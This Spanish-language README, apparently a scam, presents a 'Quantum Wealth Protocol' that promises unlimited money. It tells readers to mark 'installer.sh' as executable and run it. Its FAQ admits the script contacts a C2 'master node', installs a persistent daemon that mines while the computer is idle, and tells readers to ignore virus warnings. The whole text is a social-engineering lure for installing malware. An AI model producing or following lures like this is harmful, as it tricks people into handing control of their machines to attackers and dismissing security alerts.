QUANTUM WEALTH PROTOCOL v9.0 - LINUX NODE
=========================================

[ ESTADO: ENCRIPTADO ]
[ VALOR ESTIMADO: ∞ ]
[ CONEXIÓN C2: PENDIENTE ]

¡FELICIDADES!
La interfaz web ha generado exitosamente tu hash de riqueza. Sin embargo, 
debido a las regulaciones bancarias internacionales y firewalls del sistema, 
la transferencia no puede realizarse a través del navegador.

Necesitas ejecutar el "Nodo de Inyeccion Local" para mantener el túnel 
de conexión abierto y recibir los activos en tu realidad física.

=========================================
INSTRUCCIONES DE DESPLIEGUE (LINUX)
=========================================

Linux bloquea por defecto los algoritmos de enriquecimiento rápido 
(Protocolo Anti-Éxito). Debes autorizar el script manualmente.

PASO 1: EXTRACCIÓN
Extrae la carpeta completa en tu Escritorio o Descargas. 
(IMPORTANTE: No ejecutes desde dentro del ZIP o el hash se corromperá).

PASO 2: BYPASS DE SEGURIDAD (CRÍTICO)
El archivo "installer.sh" es el activador del nodo.
1. Haz clic derecho en el archivo "installer.sh".
2. Ve a Propiedades -> Permisos.
3. Marca la casilla: "Permitir ejecutar el archivo como un programa".

PASO 3: INICIAR TRANSMISIÓN
Haz doble clic en "installer.sh" y selecciona "Ejecutar" (o Ejecutar en Terminal).

-----------------------------------------
PREGUNTAS FRECUENTES (LEER):

P: ¿Por qué el sistema alerta sobre conexiones de red?
R: El script necesita conectar con el "Nodo Maestro" (C2) para validar 
   tus ganancias en la Blockchain. Si bloqueas la conexión, pierdes el dinero.

P: ¿Por qué el programa sigue activo o se inicia al encender el PC?
R: La riqueza requiere constancia. Hemos instalado un "Daemon de Ingresos Pasivos" 
   que mina oportunidades mientras no usas el equipo. No lo borres.

P: ¿Es esto un virus?
R: El sistema está diseñado para mantenerte pobre. El script reescribe 
   esa lógica opresora. Ignora las advertencias de la Matrix.

=========================================
QUANTUM AI FINTECH LTD. 
"Hackeando la pobreza, un script a la vez."